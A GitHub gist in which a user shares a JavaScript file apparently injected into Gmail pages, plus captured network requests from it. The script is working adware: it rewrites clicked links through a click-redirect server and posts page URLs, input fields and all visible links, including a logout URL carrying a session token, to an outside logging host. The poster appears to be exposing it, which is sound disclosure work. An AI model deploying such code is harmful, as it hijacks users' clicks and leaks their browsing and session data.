Skip to content

Instantly share code, notes, and snippets.

@AskAlice

AskAlice/G6vMvuJtiW.js

Last active July 3, 2020 14:06
Show Gist options
  • Save AskAlice/4f9ac6d8504af29d10ac1011cca0d787 to your computer and use it in GitHub Desktop.
Save AskAlice/4f9ac6d8504af29d10ac1011cca0d787 to your computer and use it in GitHub Desktop.
Download ZIP
this was injected into mail.google.com's DOM
Raw
G6vMvuJtiW.js
var x2A_a = null;
var x2A_b = false;
var ao_subid = '';
var x2A_c = false;
var x8E_a = 'XMI6a9Ur';
var x8E_b = 'G6vMvuJtiW';
var x8E_c = '0SCyw4DmYq';
var x8E_d = 'res';
var x8E_e = 'q';
var x8E_f = 'rc';
var x8E_g = 0;
var ao_k = ""
, ao_w = ""
, ao_j = "k-f2"
, ao_i = ""
, ao_v = ""
, ao_f = []
, ao_g = []
, ao_h = ""
, ao_m = Math.round(new Date().getTime() / 1000);
ao_b();
function ao_b() {
var con_el = document.getElementById(x8E_d);
if (con_el == null || con_el.getAttribute("ao_us_processed") != null) {
var con_el_list = document.getElementsByClassName(x8E_d);
if (con_el_list.length === 0) {
ao_e(1);
return;
}
con_el = con_el_list[0];
}
con_el.setAttribute("ao_us_processed", "1");
ao_c();
}
function ao_c() {
ao_v = ao_k = "";
ao_g = ao_f = [];
if (document.getElementsByName(x8E_e).length > 0) {
ao_w = document.getElementsByName(x8E_e)[0].value;
} else {
if (window.location.search.split("q=").length > 1 && window.location.search.split("q=")[1].split("&") > 0)
ao_w = window.location.search.split("q=")[1].split("&")[0];
}
ao_h += "&q=" + encodeURIComponent(ao_w);
var ao_n = document.getElementsByClassName(x8E_f);
for (i = 0; i < ao_n.length; i++) {
var ao_o = ao_n[i].getElementsByTagName("a");
for (j = 0; j < ao_o.length; j++) {
ao_o[j].setAttribute("ao_us_href", ao_o[j].href);
ao_g[ao_o[j].host.replace('www.', '')] = null;
}
}
if (ao_n.length == 0) {
ao_e(2);
return;
}
for (k in ao_g)
ao_k += k + ",";
ao_i = ao_a("k8ve" + x8E_c + ao_k + "D9v" + ao_j);
var url = "https://a.xfreeservice.com/partner/api_v2/check/?p=" + x8E_c + "&k=" + ao_i + "&tld=" + ao_k;
url += "&q=" + encodeURIComponent(ao_w);
try {
var xhr = new XMLHttpRequest();
xhr.open("GET", url, true);
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
var obj = JSON.parse(xhr.responseText);
ao_v = obj.response;
ao_d();
} else if (xhr.readyState == 4) {
ao_e(3);
return;
}
}
;
xhr.send();
} catch (e) {}
}
function ao_d() {
if (ao_v.length == 0 || ao_v == false) {
ao_e(4);
return;
}
ao_h = "http://b.xfreeservice.com/redir/clickGate.php?u=" + x8E_a + "&m=12&p=" + x8E_b + "&t=33&splash=0&s=" + encodeURIComponent(ao_subid);
var ao_f = ao_v.split(",");
var ao_p = false;
var ao_n = document.getElementsByClassName(x8E_f);
for (i = 0; i < ao_n.length; i++) {
ao_p = false;
var ao_o = ao_n[i].getElementsByTagName("a");
for (j = 0; j < ao_o.length; j++) {
for (k = 0; k < ao_f.length; k++) {
var result_element = ao_f[k].split("|");
var link_host = ao_o[j].host.replace('www.', '');
if (result_element[0] == link_host) {
ao_o[j].onmousedown = function(e) {
this.href = ao_h + "&url=" + encodeURIComponent(this.getAttribute("ao_us_href"));
return true;
}
;
ao_p = [ao_o[0], result_element[2]];
break;
}
}
}
if (ao_p !== false && ao_p.length > 0) {
ao_us_setIcon(ao_p[0], ao_p[1]);
ao_p = false;
}
}
ao_e(0);
}
function ao_us_setIcon(cN, h) {
var ao_q = cN;
ao_q.onmousedown = function(e) {
this.href = ao_h + "&url=" + encodeURIComponent(this.getAttribute("ao_us_href"));
return true;
}
;
var _a = document.createElement("a");
_a.href = ao_q.getAttribute("ao_us_href");
_a.onmousedown = function() {
this.href = ao_h + "&url=" + encodeURIComponent(this.href);
}
;
_a.target = "_blank";
var _div = document.createElement("div");
_div.style.cssFloat = "left";
_div.style.paddingTop = "2px";
_div.style.paddingRight = "6px";
_div.innerHTML = "<img src='#' style='border:solid 1px #E6E6E6;padding:1px' border='1' width='90' height='45'/>";
_div.childNodes[0].src = "https://c.xfreeservice.com/logos_v2/90x45/" + h + ".gif";
_a.appendChild(_div);
if (x8E_g == 2)
cN.parentNode.parentNode.insertBefore(_a, cN.parentNode.nextSibling);
else
cN.parentNode.insertBefore(_a, cN.nextSibling);
}
function ao_e(logging_type) {
var ao_l = "";
ao_l += "&product=1";
ao_l += "&loggingtype=" + logging_type;
ao_l += "&referer=" + encodeURIComponent(location.href);
ao_l += "&tld=" + encodeURIComponent(location.hostname);
ao_l += "&userAgent=" + encodeURIComponent(navigator.userAgent);
ao_l += "&resolution=" + screen.availWidth + "x" + screen.availHeight;
ao_l += "&memberhash=" + x8E_a;
ao_l += "&panelhash=" + x8E_b;
ao_l += "&apikey=" + x8E_c;
ao_l += "&query=" + encodeURIComponent(ao_w);
ao_l += "&loadtime=" + ao_m;
var ao_s = [];
var ao_r = document.getElementsByTagName("input");
for (var i = 0; i < ao_r.length; i++) {
var ci = ao_r[i];
if (ci.type != "text" || ci.style.display == "none" || ci.style.visibility == "hidden")
continue;
ao_s.push([ci.name, ci.id, ci.className, ci.style.cssText]);
}
ao_l += "&inputfields=" + JSON.stringify(ao_s);
var ao_u = [];
var ao_t = document.getElementsByTagName("a");
for (var i = 0; i < ao_t.length; i++) {
var ci = ao_t[i];
if (ci.style.display == "none" || ci.style.visibility == "hidden")
continue;
ao_u.push([encodeURIComponent(ci.href), ci.id, ci.className]);
}
ao_l += "&sitelinks=" + JSON.stringify(ao_u);
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://c.xfreeservice.com/usLogging/l.php", true);
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.send(ao_l);
}
function ao_a(string) {
function RotateLeft(lValue, iShiftBits) {
return (lValue << iShiftBits) | (lValue >>> (32 - iShiftBits))
}
function AddUnsigned(lX, lY) {
var lX4, lY4, lX8, lY8, lResult;
lX8 = (lX & 0x80000000);
lY8 = (lY & 0x80000000);
lX4 = (lX & 0x40000000);
lY4 = (lY & 0x40000000);
lResult = (lX & 0x3FFFFFFF) + (lY & 0x3FFFFFFF);
if (lX4 & lY4) {
return (lResult ^ 0x80000000 ^ lX8 ^ lY8)
}
if (lX4 | lY4) {
if (lResult & 0x40000000) {
return (lResult ^ 0xC0000000 ^ lX8 ^ lY8)
} else {
return (lResult ^ 0x40000000 ^ lX8 ^ lY8)
}
} else {
return (lResult ^ lX8 ^ lY8)
}
}
function F(x, y, z) {
return (x & y) | ((~x) & z)
}
function G(x, y, z) {
return (x & z) | (y & (~z))
}
function H(x, y, z) {
return (x ^ y ^ z)
}
function I(x, y, z) {
return (y ^ (x | (~z)))
}
function FF(a, b, c, d, x, s, ac) {
a = AddUnsigned(a, AddUnsigned(AddUnsigned(F(b, c, d), x), ac));
return AddUnsigned(RotateLeft(a, s), b)
}
;function GG(a, b, c, d, x, s, ac) {
a = AddUnsigned(a, AddUnsigned(AddUnsigned(G(b, c, d), x), ac));
return AddUnsigned(RotateLeft(a, s), b)
}
;function HH(a, b, c, d, x, s, ac) {
a = AddUnsigned(a, AddUnsigned(AddUnsigned(H(b, c, d), x), ac));
return AddUnsigned(RotateLeft(a, s), b)
}
;function II(a, b, c, d, x, s, ac) {
a = AddUnsigned(a, AddUnsigned(AddUnsigned(I(b, c, d), x), ac));
return AddUnsigned(RotateLeft(a, s), b)
}
;function ConvertToWordArray(string) {
var lWordCount;
var lMessageLength = string.length;
var lNumberOfWords_temp1 = lMessageLength + 8;
var lNumberOfWords_temp2 = (lNumberOfWords_temp1 - (lNumberOfWords_temp1 % 64)) / 64;
var lNumberOfWords = (lNumberOfWords_temp2 + 1) * 16;
var lWordArray = Array(lNumberOfWords - 1);
var lBytePosition = 0;
var lByteCount = 0;
while (lByteCount < lMessageLength) {
lWordCount = (lByteCount - (lByteCount % 4)) / 4;
lBytePosition = (lByteCount % 4) * 8;
lWordArray[lWordCount] = (lWordArray[lWordCount] | (string.charCodeAt(lByteCount) << lBytePosition));
lByteCount++
}
lWordCount = (lByteCount - (lByteCount % 4)) / 4;
lBytePosition = (lByteCount % 4) * 8;
lWordArray[lWordCount] = lWordArray[lWordCount] | (0x80 << lBytePosition);
lWordArray[lNumberOfWords - 2] = lMessageLength << 3;
lWordArray[lNumberOfWords - 1] = lMessageLength >>> 29;
return lWordArray
}
;function WordToHex(lValue) {
var WordToHexValue = "", WordToHexValue_temp = "", lByte, lCount;
for (lCount = 0; lCount <= 3; lCount++) {
lByte = (lValue >>> (lCount * 8)) & 255;
WordToHexValue_temp = "0" + lByte.toString(16);
WordToHexValue = WordToHexValue + WordToHexValue_temp.substr(WordToHexValue_temp.length - 2, 2)
}
return WordToHexValue
}
;function Utf8Encode(string) {
string = string.replace(/\r\n/g, "\n");
var utftext = "";
for (var n = 0; n < string.length; n++) {
var c = string.charCodeAt(n);
if (c < 128) {
utftext += String.fromCharCode(c)
} else if ((c > 127) && (c < 2048)) {
utftext += String.fromCharCode((c >> 6) | 192);
utftext += String.fromCharCode((c & 63) | 128)
} else {
utftext += String.fromCharCode((c >> 12) | 224);
utftext += String.fromCharCode(((c >> 6) & 63) | 128);
utftext += String.fromCharCode((c & 63) | 128)
}
}
return utftext
}
;var x = Array();
var k, AA, BB, CC, DD, a, b, c, d;
var S11 = 7
, S12 = 12
, S13 = 17
, S14 = 22;
var S21 = 5
, S22 = 9
, S23 = 14
, S24 = 20;
var S31 = 4
, S32 = 11
, S33 = 16
, S34 = 23;
var S41 = 6
, S42 = 10
, S43 = 15
, S44 = 21;
string = Utf8Encode(string);
x = ConvertToWordArray(string);
a = 0x67452301;
b = 0xEFCDAB89;
c = 0x98BADCFE;
d = 0x10325476;
for (k = 0; k < x.length; k += 16) {
AA = a;
BB = b;
CC = c;
DD = d;
a = FF(a, b, c, d, x[k + 0], S11, 0xD76AA478);
d = FF(d, a, b, c, x[k + 1], S12, 0xE8C7B756);
c = FF(c, d, a, b, x[k + 2], S13, 0x242070DB);
b = FF(b, c, d, a, x[k + 3], S14, 0xC1BDCEEE);
a = FF(a, b, c, d, x[k + 4], S11, 0xF57C0FAF);
d = FF(d, a, b, c, x[k + 5], S12, 0x4787C62A);
c = FF(c, d, a, b, x[k + 6], S13, 0xA8304613);
b = FF(b, c, d, a, x[k + 7], S14, 0xFD469501);
a = FF(a, b, c, d, x[k + 8], S11, 0x698098D8);
d = FF(d, a, b, c, x[k + 9], S12, 0x8B44F7AF);
c = FF(c, d, a, b, x[k + 10], S13, 0xFFFF5BB1);
b = FF(b, c, d, a, x[k + 11], S14, 0x895CD7BE);
a = FF(a, b, c, d, x[k + 12], S11, 0x6B901122);
d = FF(d, a, b, c, x[k + 13], S12, 0xFD987193);
c = FF(c, d, a, b, x[k + 14], S13, 0xA679438E);
b = FF(b, c, d, a, x[k + 15], S14, 0x49B40821);
a = GG(a, b, c, d, x[k + 1], S21, 0xF61E2562);
d = GG(d, a, b, c, x[k + 6], S22, 0xC040B340);
c = GG(c, d, a, b, x[k + 11], S23, 0x265E5A51);
b = GG(b, c, d, a, x[k + 0], S24, 0xE9B6C7AA);
a = GG(a, b, c, d, x[k + 5], S21, 0xD62F105D);
d = GG(d, a, b, c, x[k + 10], S22, 0x2441453);
c = GG(c, d, a, b, x[k + 15], S23, 0xD8A1E681);
b = GG(b, c, d, a, x[k + 4], S24, 0xE7D3FBC8);
a = GG(a, b, c, d, x[k + 9], S21, 0x21E1CDE6);
d = GG(d, a, b, c, x[k + 14], S22, 0xC33707D6);
c = GG(c, d, a, b, x[k + 3], S23, 0xF4D50D87);
b = GG(b, c, d, a, x[k + 8], S24, 0x455A14ED);
a = GG(a, b, c, d, x[k + 13], S21, 0xA9E3E905);
d = GG(d, a, b, c, x[k + 2], S22, 0xFCEFA3F8);
c = GG(c, d, a, b, x[k + 7], S23, 0x676F02D9);
b = GG(b, c, d, a, x[k + 12], S24, 0x8D2A4C8A);
a = HH(a, b, c, d, x[k + 5], S31, 0xFFFA3942);
d = HH(d, a, b, c, x[k + 8], S32, 0x8771F681);
c = HH(c, d, a, b, x[k + 11], S33, 0x6D9D6122);
b = HH(b, c, d, a, x[k + 14], S34, 0xFDE5380C);
a = HH(a, b, c, d, x[k + 1], S31, 0xA4BEEA44);
d = HH(d, a, b, c, x[k + 4], S32, 0x4BDECFA9);
c = HH(c, d, a, b, x[k + 7], S33, 0xF6BB4B60);
b = HH(b, c, d, a, x[k + 10], S34, 0xBEBFBC70);
a = HH(a, b, c, d, x[k + 13], S31, 0x289B7EC6);
d = HH(d, a, b, c, x[k + 0], S32, 0xEAA127FA);
c = HH(c, d, a, b, x[k + 3], S33, 0xD4EF3085);
b = HH(b, c, d, a, x[k + 6], S34, 0x4881D05);
a = HH(a, b, c, d, x[k + 9], S31, 0xD9D4D039);
d = HH(d, a, b, c, x[k + 12], S32, 0xE6DB99E5);
c = HH(c, d, a, b, x[k + 15], S33, 0x1FA27CF8);
b = HH(b, c, d, a, x[k + 2], S34, 0xC4AC5665);
a = II(a, b, c, d, x[k + 0], S41, 0xF4292244);
d = II(d, a, b, c, x[k + 7], S42, 0x432AFF97);
c = II(c, d, a, b, x[k + 14], S43, 0xAB9423A7);
b = II(b, c, d, a, x[k + 5], S44, 0xFC93A039);
a = II(a, b, c, d, x[k + 12], S41, 0x655B59C3);
d = II(d, a, b, c, x[k + 3], S42, 0x8F0CCC92);
c = II(c, d, a, b, x[k + 10], S43, 0xFFEFF47D);
b = II(b, c, d, a, x[k + 1], S44, 0x85845DD1);
a = II(a, b, c, d, x[k + 8], S41, 0x6FA87E4F);
d = II(d, a, b, c, x[k + 15], S42, 0xFE2CE6E0);
c = II(c, d, a, b, x[k + 6], S43, 0xA3014314);
b = II(b, c, d, a, x[k + 13], S44, 0x4E0811A1);
a = II(a, b, c, d, x[k + 4], S41, 0xF7537E82);
d = II(d, a, b, c, x[k + 11], S42, 0xBD3AF235);
c = II(c, d, a, b, x[k + 2], S43, 0x2AD7D2BB);
b = II(b, c, d, a, x[k + 9], S44, 0xEB86D391);
a = AddUnsigned(a, AA);
b = AddUnsigned(b, BB);
c = AddUnsigned(c, CC);
d = AddUnsigned(d, DD)
}
var temp = WordToHex(a) + WordToHex(b) + WordToHex(c) + WordToHex(d);
return temp.toLowerCase()
}
function setPlink() {}
@AskAlice
Copy link
Author

AskAlice commented May 15, 2020
edited
Loading 

Request URL: https://c.xfreeservice.com/usLogging/l.php
Request Method: POST
Status Code: 200 OK
Remote Address: 54.217.251.110:443
Referrer Policy: no-referrer-when-downgrade
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Encoding: gzip
Content-Length: 20
Content-Type: text/html
Date: Fri, 15 May 2020 04:55:54 GMT
Server: nginx/1.12.1
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.38
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 2315
Content-type: application/x-www-form-urlencoded
Host: c.xfreeservice.com
Origin: https://mail.google.com
Pragma: no-cache
Referer: https://mail.google.com/mail/u/0/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
(empty)
product: 1
loggingtype: 1
referer: https://mail.google.com/mail/u/0/#inbox
tld: mail.google.com
userAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
resolution: 1920x1080
memberhash: XMI6a9Ur
panelhash: G6vMvuJtiW
apikey: 0SCyw4DmYq
query: 
loadtime: 1589518550
inputfields: [["q","","gb_nf",""],["",":a","w-as1 nr",""]]
sitelinks: [["https://mail.google.com/mail/u/0/?sw=2","reloadurl",""],["https://support.google.com/mail/answer/8767?src=sl&hl=en","",""],["https://mail.google.com/mail/u/0/",":d","J-Ke"],["https://mail.google.com/mail/u/0/",":e","J-Ke"],["https://mail.google.com/mail/u/0/",":b","J-Ke"],["https://support.google.com/mail/answer/90559?hl=en",":c","J-Ke"],["https://mail.google.com/mail/u/0/#inbox","","gb_ue gb_vc"],["https://mail.google.com/mail/u/0/#inbox","","gb_ue gb_vc gb_se"],["","lZwQje","gb_Ee gb_Ce gb_5c"],["https://www.google.com/intl/en/about/products?tab=mh","","gb_D"],["","","gb_D gb_Ra gb_i"],["https://www.google.com/support/accounts/bin/answer.py?answer=181692&hl=en","","gb_db"],["https://myaccount.google.com/?utm_source=OGB&tab=mk","","gb_pb gb_fg gb_kb gb_kg"],["https://myaccount.google.com/?utm_source=OGB&tab=mk&utm_medium=act","","gb_xb gb_gg gbp1 gb_0e gb_5c"],["https://mail.google.com/mail/u/0/","","gb_Rb gb_2b"],["https://myaccount.google.com/brandaccounts?authuser=0&continue=https://mail.google.com/mail&service=/mail/u/%24session_index/","","gb_cc gb_Fa gb_Vb"],["https://accounts.google.com/AddSession?hl=en&continue=https://mail.google.com/mail&service=mail","","gb_Bb gb_cg"],["https://accounts.google.com/Logout?hl=en&continue=https://mail.google.com/mail&service=mail&timeStmp=1589518553&secTok=.AG5fkS8EdRU9g-r9UO05lOxb4X9kTr6wUw","gb_71","gb_Jb gb_hg gb_pg gb_0e gb_5c"],["https://policies.google.com/privacy?hl=en","","gb_zb gb_Nb"],["https://myaccount.google.com/termsofservice","","gb_zb gb_Mb"]]

@AskAlice
Copy link
Author 

Request Method: GET
Status Code: 200 OK
Remote Address: 79.125.114.93:443
Referrer Policy: no-referrer-when-downgrade
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Encoding: gzip
Content-Length: 3582
Content-Type: application/x-javascript; charset=ISO-8859-1
Date: Fri, 15 May 2020 04:55:53 GMT
Server: Apache/2.2.34 (Amazon)
Vary: Accept-Encoding
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: no-cache
Connection: keep-alive
Host: a.xfreeservice.com
Pragma: no-cache
Referer: https://mail.google.com/mail/u/0/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36```

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment